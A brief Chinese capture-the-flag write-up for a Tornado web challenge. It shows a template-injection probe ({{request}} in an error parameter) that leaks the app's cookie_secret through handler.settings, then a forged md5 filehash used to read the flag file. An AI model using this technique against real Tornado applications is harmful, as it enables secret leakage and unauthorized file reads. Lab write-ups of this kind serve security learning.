打开网页发现有几个目录,整理后:
http://220.249.52.133:35356/file?filename=/flag.txt&filehash=ae495bad95220a5138f3437fb9919a29 flag in /fllllllllllllag http://220.249.52.133:35356/file?filename=/welcome.txt&filehash=fb6b0556a8bc3be3fb3f104693632b1d /welcome.txt render http://220.249.52.133:35356/file?filename=/hints.txt&filehash=502422d6f60c99aa7127fb4c21950f65 /hints.txt md5(cookie_secret+md5(filename))
发现我们要的flag在/fllllllllllllag中,访问fllllllllllllag发现有个报错
一开始尝试了模板注入,发现过滤了“()-__等符号
访问request发现没有想要的信息
http://220.249.52.133:35356/error?msg={{request}}
查阅得知tornado框架存在附属文件handler.settings里面有cookie
获取到'cookie_secret': 'dfed4308-c5de-44ed-b2ec-e07a018f8c58'
根据md5(cookie_secret+md5(filename))我们验证一下filehash是否正确
得到的结果是正确的,那么我们构造一下payload:
220.249.52.133:35356/file?filename=/fllllllllllllag&filehash=74180e022f23e3136a6650902c9275a7
